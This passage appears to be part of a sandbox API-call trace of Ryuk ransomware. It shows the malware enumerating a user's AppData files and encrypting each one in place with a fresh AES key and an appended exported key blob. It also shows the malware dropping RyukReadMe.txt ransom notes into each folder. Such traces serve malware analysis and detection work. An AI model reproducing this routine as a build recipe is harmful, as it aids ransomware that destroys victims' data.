flProtect=0x4) returned 0x2760000 [0148.354] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.354] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x166c8, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x166c8, lpOverlapped=0x0) returned 1 [0148.356] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.356] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x166c8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x166d0) returned 1 [0148.356] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.356] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x166d0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x166d0, lpOverlapped=0x0) returned 1 [0148.357] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.357] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.357] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.357] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.357] CloseHandle (hObject=0x18c) returned 1 [0148.373] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.377] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.377] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.377] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.378] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2Ma76pE283xtnV.m4a", dwFileAttributes=0x80) returned 1 [0148.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2Ma76pE283xtnV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\2ma76pe283xtnv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.378] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=3262) returned 1 [0148.378] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=3262) returned 1 [0148.378] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xb9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.378] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.379] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.379] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.379] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.379] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.379] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xcbe, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xcbe, lpOverlapped=0x0) returned 1 [0148.379] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.379] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xcbe, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xcc0) returned 1 [0148.379] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.379] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xcc0, lpOverlapped=0x0) returned 1 [0148.379] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.379] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.379] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.379] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.379] CloseHandle (hObject=0x18c) returned 1 [0148.399] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.403] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.403] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.403] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.403] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.404] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\3sOM2p6si5PIY.docx", dwFileAttributes=0x80) returned 1 [0148.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\3sOM2p6si5PIY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\3som2p6si5piy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.404] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=66594) returned 1 [0148.404] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=66594) returned 1 [0148.404] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x10300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.404] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.405] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.405] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.405] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.405] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.405] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10422, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x10422, lpOverlapped=0x0) returned 1 [0148.406] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.406] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10422, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10430) returned 1 [0148.407] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.407] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10430, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10430, lpOverlapped=0x0) returned 1 [0148.407] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.407] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.407] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.407] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.407] CloseHandle (hObject=0x18c) returned 1 [0148.432] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.436] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.436] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.437] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.437] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.437] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xS22J.doc", dwFileAttributes=0x80) returned 1 [0148.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xS22J.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xs22j.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.437] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=33102) returned 1 [0148.437] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=33102) returned 1 [0148.437] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x802c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.437] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.438] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.438] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.438] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.438] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.438] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x814e, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x814e, lpOverlapped=0x0) returned 1 [0148.439] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.439] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x814e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x8150) returned 1 [0148.439] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.439] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8150, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x8150, lpOverlapped=0x0) returned 1 [0148.439] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.439] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.439] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.439] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.439] CloseHandle (hObject=0x18c) returned 1 [0148.455] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.459] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.459] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.459] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.460] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9z4S7qYdpgF3-.flv", dwFileAttributes=0x80) returned 1 [0148.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9z4S7qYdpgF3-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9z4s7qydpgf3-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.460] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=87781) returned 1 [0148.460] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=87781) returned 1 [0148.460] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x155c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.460] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.461] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.461] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.461] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.461] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.461] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x156e5, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x156e5, lpOverlapped=0x0) returned 1 [0148.462] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.462] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x156e5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x156f0) returned 1 [0148.463] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.463] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x156f0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x156f0, lpOverlapped=0x0) returned 1 [0148.463] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.463] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.463] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.463] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.463] CloseHandle (hObject=0x18c) returned 1 [0148.479] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.483] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.483] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.483] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.483] SetLastError (dwErrCode=0x0) [0148.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.484] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0148.485] CloseHandle (hObject=0x18c) returned 1 [0148.485] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0148.486] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.486] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.487] SetLastError (dwErrCode=0x0) [0148.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.488] CloseHandle (hObject=0x190) returned 1 [0148.488] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.488] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.488] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.488] SetLastError (dwErrCode=0x0) [0148.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.490] CloseHandle (hObject=0x194) returned 1 [0148.490] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0148.491] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.491] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.491] SetLastError (dwErrCode=0x0) [0148.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.492] GetLastError () returned 0x0 [0148.492] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.493] CloseHandle (hObject=0x198) returned 1 [0148.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.493] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.493] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.493] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.494] SetLastError (dwErrCode=0x0) [0148.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, 